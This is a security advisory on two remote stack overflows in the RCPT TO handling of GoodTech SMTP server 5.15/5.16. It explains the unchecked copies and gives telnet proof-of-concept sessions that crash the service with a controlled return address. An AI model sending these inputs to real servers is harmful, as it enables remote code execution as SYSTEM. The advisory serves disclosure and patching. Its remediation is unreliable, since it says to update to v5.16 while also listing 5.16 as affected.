Product: SMTP server by GoodTech Systems
Affected Version: 5.16 Evaluation (verified), <= regged and 5.15 probably too
Not affected Version: 5.17
OS affected: All WinNT (NT/2K/XP/2K3)
Risk: Critical
Remote Exploit: yes
URL: http://www.goodtechsys.com/smtpdnt2000.asp

Overview
========
The product provides Simple Mail Transfer Protocol (SMTP) to any email client
out of the box. It forwards email messages directly to their recipients.
GoodTech SMTP server runs as a service on the host Windows machine.

Vulnerabilities
===============

        1) Stack overflow in RCPT TO command handling

        Unchecked string copies allow a classic stack overflow.

        Details :
        A cascade of unchecked string copies is responsible for this
        vulnerability :
                - The maximum length of a command is 4096.
                - The requested email is copied without checking nor direct
                consequences into a 2048 bytes buffer.
                - The domain is extracted and copied without checking nor
                direct consequences into a 256 bytes buffer.
                - The following code is executed : sprintf(buf,"mx.%s",domain)
                buf is only 64 bytes long, and can thus be overflowed,
                overwriting a string containing the DNS server to be used to
                find the MX request.
                - This string being non-empty, the following code is executed:
                sprintf(buf1024, "Using DNS Server %s", dnsserver)
                but since we have ~4000 bytes for the domain, this can overflow
                and overwrite the return address of the function, allowing
                arbitrary code execution.

        Risk : Critical
        The attacker may execute arbitrary code with the privileges of the
        SYSTEM user (by default).

        Proof of concept :

        $ telnet localhost 25
        Connected to localhost.
        Escape character is '^]'.
        220 test Simple Mail Transfer Service Ready. Version 5.15 (Evaluation)
        HELO aaa
        250 OK
        RCPT TO: <aa@|'A'x1100>
        Connection closed by foreign host.

        Service crashes with EIP==0x41414141

        Workaround :
        There is no possible workaround.

        Solution :
        Update to v5.16

        -----------------------------------------------------------------------
        2) Stack overflow in multiple RCPT TO commands handling

        Unchecked string copy allows a classic stack overflow.

        Details :
        For each RCPT TO command, the server fills a 1300 bytes structure
        containing the requested command and the MX server for the requested
        email.
        The server allows up to 99 RCPT TO for a single mail, but the filling
        of this structure is done via unchecked string copy : the command,
        up to 4096 bytes long, is copied without checking into the structure.
        This behaviour allows us to overwrite the return address of the thread
        by issuing a long command in the 99th RCPT TO command.
        We have then to issue a QUIT command to exit the thread and execute
        our code.

        Risk : Critical
        The attacker may execute arbitrary code with the privileges of the
        SYSTEM user (by default).

        Proof of concept :

        $ telnet localhost 25
        Connected to localhost.
        Escape character is '^]'.
        220 test Simple Mail Transfer Service Ready. Version 5.15 (Evaluation)
        HELO aaa
        250 OK
        -- Repeat this part 98 times
        RCPT TO: <aa_at_aa>
        250 OK
        --
        RCPT TO: <|'A'x2600|@localhost>
        250 OK
        QUIT
        Connection closed by foreign host.

        Service crashes with EIP==0x41414141

        Workaround :
        There is no possible workaround.

        Solution :
        Update to v5.16